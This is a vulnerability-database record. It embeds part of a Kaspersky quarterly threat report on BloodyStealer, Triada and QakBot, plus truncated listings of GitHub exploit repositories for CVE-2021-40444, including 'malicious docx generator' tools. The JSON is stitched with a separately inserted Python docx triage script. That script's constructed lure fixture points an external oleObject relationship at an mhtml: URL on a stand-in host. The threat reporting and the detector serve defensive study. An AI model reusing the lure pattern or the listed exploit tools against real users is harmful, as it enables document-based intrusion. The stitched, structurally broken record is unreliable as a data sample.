The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. 
In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app; some users turn instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans. 
You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine. 
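The two document-borne lures named in the QakBot paragraph above (macro-bearing Office files) and in the CVE-2021-40444 malicious-docx tooling listed among the related exploit records further down (a document whose relationships pull content from outside the file) can both be triaged statically, because a docx/docm is a zip of XML parts. The script below is an added example and is not Kaspersky's code or code from any of the listed repositories; `triage_docx`, `build_sample`, the in-memory sample documents and the `example.invalid` targets are all constructed for illustration, and the list of risky relationship types is the author's heuristic, not an Office specification.

```python
"""Static triage of an OOXML (docx/docm) file for two lure mechanisms:
embedded VBA macros and relationships that reach outside the document.
Added example; the sample documents are constructed, not real samples."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Heuristic (assumption): relationship types that should not normally point
# outside the package. An external 'oleObject' target is the pattern the
# CVE-2021-40444 docx generators rely on.
RISKY_REL_TYPES = ("oleObject", "attachedTemplate", "frame", "subDocument")
# Schemes a plain hyperlink relationship may legitimately use.
BENIGN_SCHEMES = {"http", "https", "mailto"}


def triage_docx(data: bytes) -> dict:
    """Return {'macros': bool, 'external': [...], 'suspicious': [...]} for
    the OOXML package in `data`. 'external' lists every relationship with
    TargetMode="External"; 'suspicious' is the subset whose relationship
    type is risky or whose target scheme is not an ordinary web/mail URL."""
    report = {"macros": False, "external": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Any vbaProject.bin part means the document carries VBA code.
        report["macros"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                entry = {"part": name, "type": rtype, "target": target}
                report["external"].append(entry)
                scheme = urlsplit(target).scheme.lower()
                if rtype in RISKY_REL_TYPES or scheme not in BENIGN_SCHEMES:
                    report["suspicious"].append(entry)
    return report


def build_sample(rels_xml: str, with_macro: bool) -> bytes:
    """Build a minimal OOXML package in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.'
                    'openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
        if with_macro:
            # Placeholder bytes standing in for a real OLE-wrapped VBA project.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


RELS_HEAD = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
# Constructed: an ordinary document with one hyperlink to a web page.
CLEAN_RELS = RELS_HEAD + (
    f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
    'Target="https://example.com/" TargetMode="External"/></Relationships>')
# Constructed: an oleObject relationship whose external target is an
# mhtml: URL, the shape of the CVE-2021-40444 lure (example.invalid host).
LURE_RELS = RELS_HEAD + (
    f'<Relationship Id="rId5" Type="{OFFICE_REL}oleObject" '
    'Target="mhtml:http://example.invalid/side.html!x-usc:'
    'http://example.invalid/side.html" TargetMode="External"/></Relationships>')


if __name__ == "__main__":
    for label, rels, macro in (("clean", CLEAN_RELS, False), ("lure", LURE_RELS, True)):
        print(label, triage_docx(build_sample(rels, macro)))
```

Run it on a real file with `triage_docx(open(path, "rb").read())`; a hit on `macros` or a non-empty `suspicious` list is a reason to detonate the document in a sandbox rather than deliver it. Relationship parsing is done on every `.rels` part, not just `word/_rels/document.xml.rels`, because external targets can also live in header, footer or embedding relationships.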
The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", 
"description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal 
in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": 
"2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - 
Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": 
{"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, 
